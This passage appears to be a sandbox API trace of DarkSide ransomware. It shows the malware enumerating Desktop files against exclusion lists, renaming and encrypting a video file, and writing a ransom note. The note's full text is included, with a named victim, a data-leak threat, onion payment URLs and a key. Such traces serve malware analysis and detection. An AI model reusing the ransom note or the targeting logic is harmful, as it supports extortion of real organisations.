dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0147.927] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.927] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfb4cd85 [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x332f308f [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2a1a6b50 [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68ee0fe7 [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9be836b [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x545130dc [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6cb6bbe8 [0147.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7da932e9 [0147.936] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0xe77c5df3 [0147.936] RtlComputeCrc32 (PartialCrc=0x5df3, Buffer=0x4940094, Length=0x80) returned 0x66a4692a [0147.936] RtlComputeCrc32 (PartialCrc=0x692a, Buffer=0x4940094, Length=0x80) returned 0xd05967e0 [0147.936] RtlComputeCrc32 (PartialCrc=0x67e0, Buffer=0x4940094, Length=0x80) returned 0xfca4efba [0147.936] RtlComputeCrc32 (PartialCrc=0xefba, Buffer=0x4940094, Length=0x80) returned 0xd310bc7e [0147.936] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0147.936] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0147.936] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0147.936] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6c934a0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd6c934a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6c934a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0147.936] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0147.936] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.936] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0147.936] _wcsicmp (_Str1="backup", _Str2="H1L2uD_Z3TzCntcS0qS") returned -6 [0147.936] wcslen (_String="backup") returned 0x6 [0147.936] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.936] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.937] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e58130, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x75166450, ftLastAccessTime.dwHighDateTime=0x1d5dfa4, ftLastWriteTime.dwLowDateTime=0x75166450, ftLastWriteTime.dwHighDateTime=0x1d5dfa4, nFileSizeHigh=0x0, nFileSizeLow=0x157a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWgYJLRgIO7alplF6d-p.mkv", cAlternateFileName="HWGYJL~1.MKV")) returned 1 [0147.937] _wcsicmp (_Str1="HWgYJLRgIO7alplF6d-p.mkv", _Str2="README.c06622a1.TXT") returned -10 [0147.937] wcsstr (_Str="HWgYJLRgIO7alplF6d-p.mkv", _SubStr="README") returned 0x0 [0147.937] _wcsicmp (_Str1="autorun.inf", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned -7 [0147.937] wcslen (_String="autorun.inf") returned 0xb [0147.937] _wcsicmp (_Str1="boot.ini", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned -6 [0147.937] wcslen (_String="boot.ini") returned 0x8 [0147.937] _wcsicmp (_Str1="bootfont.bin", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned -6 [0147.937] wcslen (_String="bootfont.bin") returned 0xc [0147.937] _wcsicmp (_Str1="bootsect.bak", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned -6 [0147.937] wcslen (_String="bootsect.bak") returned 0xc [0147.937] _wcsicmp (_Str1="desktop.ini", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned -4 [0147.937] wcslen (_String="desktop.ini") returned 0xb [0147.937] _wcsicmp (_Str1="iconcache.db", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned 1 [0147.937] wcslen (_String="iconcache.db") returned 0xc [0147.937] _wcsicmp (_Str1="ntldr", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned 6 [0147.937] wcslen (_String="ntldr") returned 0x5 [0147.937] _wcsicmp (_Str1="ntuser.dat", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned 6 [0147.937] wcslen (_String="ntuser.dat") returned 0xa [0147.937] _wcsicmp (_Str1="ntuser.dat.log", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned 6 [0147.937] wcslen (_String="ntuser.dat.log") returned 0xe [0147.937] _wcsicmp (_Str1="ntuser.ini", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned 6 [0147.937] wcslen (_String="ntuser.ini") returned 0xa [0147.937] _wcsicmp (_Str1="thumbs.db", _Str2="HWgYJLRgIO7alplF6d-p.mkv") returned 12 [0147.937] wcslen (_String="thumbs.db") returned 0x9 [0147.937] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0147.937] wcslen (_String="386") returned 0x3 [0147.937] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0147.937] wcslen (_String="adv") returned 0x3 [0147.937] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0147.937] wcslen (_String="ani") returned 0x3 [0147.937] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0147.937] wcslen (_String="bat") returned 0x3 [0147.937] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0147.937] wcslen (_String="bin") returned 0x3 [0147.937] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0147.938] wcslen (_String="cab") returned 0x3 [0147.938] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0147.938] wcslen (_String="cmd") returned 0x3 [0147.938] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0147.938] wcslen (_String="com") returned 0x3 [0147.938] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0147.938] wcslen (_String="cpl") returned 0x3 [0147.938] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0147.938] wcslen (_String="cur") returned 0x3 [0147.938] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0147.938] wcslen (_String="deskthemepack") returned 0xd [0147.938] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0147.938] wcslen (_String="diagcab") returned 0x7 [0147.938] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0147.938] wcslen (_String="diagcfg") returned 0x7 [0147.938] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0147.938] wcslen (_String="diagpkg") returned 0x7 [0147.938] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0147.938] wcslen (_String="dll") returned 0x3 [0147.938] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0147.938] wcslen (_String="drv") returned 0x3 [0147.938] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0147.938] wcslen (_String="exe") returned 0x3 [0147.938] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0147.938] wcslen (_String="hlp") returned 0x3 [0147.938] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0147.938] wcslen (_String="icl") returned 0x3 [0147.938] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0147.938] wcslen (_String="icns") returned 0x4 [0147.938] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0147.938] wcslen (_String="ico") returned 0x3 [0147.938] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0147.938] wcslen (_String="ics") returned 0x3 [0147.938] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0147.938] wcslen (_String="idx") returned 0x3 [0147.938] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0147.938] wcslen (_String="ldf") returned 0x3 [0147.939] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0147.939] wcslen (_String="lnk") returned 0x3 [0147.939] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0147.939] wcslen (_String="mod") returned 0x3 [0147.939] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0147.939] wcslen (_String="mpa") returned 0x3 [0147.939] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0147.939] wcslen (_String="msc") returned 0x3 [0147.939] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0147.939] wcslen (_String="msp") returned 0x3 [0147.939] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0147.939] wcslen (_String="msstyles") returned 0x8 [0147.939] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0147.939] wcslen (_String="msu") returned 0x3 [0147.939] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0147.939] wcslen (_String="nls") returned 0x3 [0147.939] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0147.939] wcslen (_String="nomedia") returned 0x7 [0147.939] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0147.939] wcslen (_String="ocx") returned 0x3 [0147.939] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0147.939] wcslen (_String="prf") returned 0x3 [0147.939] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0147.939] wcslen (_String="ps1") returned 0x3 [0147.939] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0147.939] wcslen (_String="rom") returned 0x3 [0147.939] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0147.939] wcslen (_String="rtp") returned 0x3 [0147.939] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0147.939] wcslen (_String="scr") returned 0x3 [0147.939] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0147.939] wcslen (_String="shs") returned 0x3 [0147.939] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0147.939] wcslen (_String="spl") returned 0x3 [0147.939] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0147.939] wcslen (_String="sys") returned 0x3 [0147.939] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0147.940] wcslen (_String="theme") returned 0x5 [0147.940] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0147.940] wcslen (_String="themepack") returned 0x9 [0147.940] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0147.940] wcslen (_String="wpx") returned 0x3 [0147.940] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0147.940] wcslen (_String="lock") returned 0x4 [0147.940] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0147.940] wcslen (_String="key") returned 0x3 [0147.940] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0147.940] wcslen (_String="hta") returned 0x3 [0147.940] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0147.940] wcslen (_String="msi") returned 0x3 [0147.940] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0147.940] wcslen (_String="pdb") returned 0x3 [0147.940] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0147.940] wcslen (_String="sql") returned 0x3 [0147.940] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0147.940] wcslen (_String="sqlite") returned 0x6 [0147.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.940] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.940] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.940] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.940] wcscpy (in: _Dest=0x44d00cc, _Source="HWgYJLRgIO7alplF6d-p.mkv" | out: _Dest="HWgYJLRgIO7alplF6d-p.mkv") returned="HWgYJLRgIO7alplF6d-p.mkv" [0147.940] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv", dwFileAttributes=0x80) returned 1 [0147.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwgyjlrgio7alplf6d-p.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0147.941] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.941] ReadFile (in: hFile=0x640, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.942] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x67ddf0b9 [0147.942] RtlComputeCrc32 (PartialCrc=0xf0b9, Buffer=0x3feb74, Length=0x80) returned 0x3d0e247a [0147.942] RtlComputeCrc32 (PartialCrc=0x247a, Buffer=0x3feb74, Length=0x80) returned 0x68016b4d [0147.942] RtlComputeCrc32 (PartialCrc=0x6b4d, Buffer=0x3feb74, Length=0x80) returned 0x4da95d8c [0147.942] RtlComputeCrc32 (PartialCrc=0x5d8c, Buffer=0x3feb74, Length=0x80) returned 0x1e5e1624 [0147.942] CloseHandle (hObject=0x640) returned 1 [0147.942] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.942] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv" [0147.942] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv") returned 0x42 [0147.942] wcscpy (in: _Dest=0x44e0104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.942] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwgyjlrgio7alplf6d-p.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwgyjlrgio7alplf6d-p.mkv.c06622a1"), dwFlags=0x8) returned 1 [0147.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HWgYJLRgIO7alplF6d-p.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwgyjlrgio7alplf6d-p.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0147.944] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.944] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2498dbcf [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa3a9150 [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x124a9040 [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c2a5922 [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24fffd53 [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x531575e4 [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f870f6d [0147.949] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25a8be5c [0147.952] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0x2d20eb52 [0147.952] RtlComputeCrc32 (PartialCrc=0xeb52, Buffer=0x49d0094, Length=0x80) returned 0x6807fbae [0147.952] RtlComputeCrc32 (PartialCrc=0xfbae, Buffer=0x49d0094, Length=0x80) returned 0x77e3c485 [0147.952] RtlComputeCrc32 (PartialCrc=0xc485, Buffer=0x49d0094, Length=0x80) returned 0xf95fd38b [0147.952] RtlComputeCrc32 (PartialCrc=0xd38b, Buffer=0x49d0094, Length=0x80) returned 0x103f6bf6 [0147.953] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0147.953] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.953] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.953] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21bcf3c0, ftCreationTime.dwHighDateTime=0x1d5df1b, ftLastAccessTime.dwLowDateTime=0x9748ca80, ftLastAccessTime.dwHighDateTime=0x1d5db59, ftLastWriteTime.dwLowDateTime=0x9748ca80, ftLastWriteTime.dwHighDateTime=0x1d5db59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Id8szDz7a0w", cAlternateFileName="ID8SZD~1")) returned 1 [0147.953] _wcsicmp (_Str1="$recycle.bin", _Str2="Id8szDz7a0w") returned -69 [0147.953] wcslen (_String="$recycle.bin") returned 0xc [0147.953] _wcsicmp (_Str1="config.msi", _Str2="Id8szDz7a0w") returned -6 [0147.953] wcslen (_String="config.msi") returned 0xa [0147.953] _wcsicmp (_Str1="$windows.~bt", _Str2="Id8szDz7a0w") returned -69 [0147.953] wcslen (_String="$windows.~bt") returned 0xc [0147.953] _wcsicmp (_Str1="$windows.~ws", _Str2="Id8szDz7a0w") returned -69 [0147.953] wcslen (_String="$windows.~ws") returned 0xc [0147.953] _wcsicmp (_Str1="windows", _Str2="Id8szDz7a0w") returned 14 [0147.953] wcslen (_String="windows") returned 0x7 [0147.953] _wcsicmp (_Str1="appdata", _Str2="Id8szDz7a0w") returned -8 [0147.953] wcslen (_String="appdata") returned 0x7 [0147.953] _wcsicmp (_Str1="application data", _Str2="Id8szDz7a0w") returned -8 [0147.953] wcslen (_String="application data") returned 0x10 [0147.953] _wcsicmp (_Str1="boot", _Str2="Id8szDz7a0w") returned -7 [0147.953] wcslen (_String="boot") returned 0x4 [0147.953] _wcsicmp (_Str1="google", _Str2="Id8szDz7a0w") returned -2 [0147.953] wcslen (_String="google") returned 0x6 [0147.953] _wcsicmp (_Str1="mozilla", _Str2="Id8szDz7a0w") returned 4 [0147.953] wcslen (_String="mozilla") returned 0x7 [0147.953] _wcsicmp (_Str1="program files", _Str2="Id8szDz7a0w") returned 7 [0147.953] wcslen (_String="program files") returned 0xd [0147.953] _wcsicmp (_Str1="program files (x86)", _Str2="Id8szDz7a0w") returned 7 [0147.953] wcslen (_String="program files (x86)") returned 0x13 [0147.953] _wcsicmp (_Str1="programdata", _Str2="Id8szDz7a0w") returned 7 [0147.953] wcslen (_String="programdata") returned 0xb [0147.953] _wcsicmp (_Str1="system volume information", _Str2="Id8szDz7a0w") returned 10 [0147.953] wcslen (_String="system volume information") returned 0x19 [0147.954] _wcsicmp (_Str1="tor browser", _Str2="Id8szDz7a0w") returned 11 [0147.954] wcslen (_String="tor browser") returned 0xb [0147.954] _wcsicmp (_Str1="windows.old", _Str2="Id8szDz7a0w") returned 14 [0147.954] wcslen (_String="windows.old") returned 0xb [0147.954] _wcsicmp (_Str1="intel", _Str2="Id8szDz7a0w") returned 10 [0147.954] wcslen (_String="intel") returned 0x5 [0147.954] _wcsicmp (_Str1="msocache", _Str2="Id8szDz7a0w") returned 4 [0147.954] wcslen (_String="msocache") returned 0x8 [0147.954] _wcsicmp (_Str1="perflogs", _Str2="Id8szDz7a0w") returned 7 [0147.954] wcslen (_String="perflogs") returned 0x8 [0147.954] _wcsicmp (_Str1="x64dbg", _Str2="Id8szDz7a0w") returned 15 [0147.954] wcslen (_String="x64dbg") returned 0x6 [0147.954] _wcsicmp (_Str1="public", _Str2="Id8szDz7a0w") returned 7 [0147.954] wcslen (_String="public") returned 0x6 [0147.954] _wcsicmp (_Str1="all users", _Str2="Id8szDz7a0w") returned -8 [0147.954] wcslen (_String="all users") returned 0x9 [0147.954] _wcsicmp (_Str1="default", _Str2="Id8szDz7a0w") returned -5 [0147.954] wcslen (_String="default") returned 0x7 [0147.954] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0147.954] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 0x2b [0147.954] wcscpy (in: _Dest=0x44b00bc, _Source="Id8szDz7a0w" | out: _Dest="Id8szDz7a0w") returned="Id8szDz7a0w" [0147.954] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.954] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.954] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0147.954] GetNamedSecurityInfoW () returned 0x0 [0147.954] SetEntriesInAclW () returned 0x0 [0147.954] SetNamedSecurityInfoW () returned 0x0 [0147.963] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57158) returned 1 [0147.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0147.963] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 1 [0147.963] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0147.963] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0147.963] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0147.964] CloseHandle (hObject=0x1c) returned 1 [0147.964] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0147.965] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS 